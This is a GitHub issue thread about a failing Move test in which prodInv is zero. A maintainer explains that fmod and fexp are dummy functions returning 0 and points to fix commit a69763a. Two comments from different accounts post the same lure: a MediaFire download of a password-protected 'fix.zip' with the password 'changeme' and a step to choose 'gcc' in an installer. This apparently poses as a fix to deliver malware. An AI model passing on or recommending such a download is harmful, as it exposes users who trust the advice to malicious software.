### ISSUE TITLE
```prodInv``` equals to zero.

### ISSUE THREAD

**Issue by Tranduy1dol** [sota-zk-labs/ornn#2]
```
┌── test_fallback ──────
│ error[E11001]: test failure
│     ┌─ /home/ubuntu/code/navori/sources/cpu/layout7/cpu_constraint_poly.move:731:13
│     │
│ 109 │     public fun fallback(ctx: &vector<u256>): u256 {
│     │                -------- In this function in 0x32cbbb0126afea3e1b741861ee090c37e31ef3546a2c318d7fb664227b4e22a7::cpu_constraint_poly
│     ·
│ 731 │             assert!(prodInv != 0, EPRODUCT_INVERSE_ZERO);
│     │             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Test was not expected to error, but it aborted with code 1 originating in the module 32cbbb0126afea3e1b741861ee090c37e31ef3546a2c318d7fb664227b4e22a7::cpu_constraint_poly rooted here
│ 
│ 
│ stack trace
│ 	cpu_constraint_poly::test_fallback(/home/ubuntu/code/navori/sources/cpu/layout7/cpu_constraint_poly.move:3074)
│ 
└──────────────────
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 0x5ea000000** [comment]
because the current fmod and fexp is a dummy functions, always return 0. take the real implementation somewhere ✌️

**Comment by 0x5ea000000** [comment]
fixed in a69763a
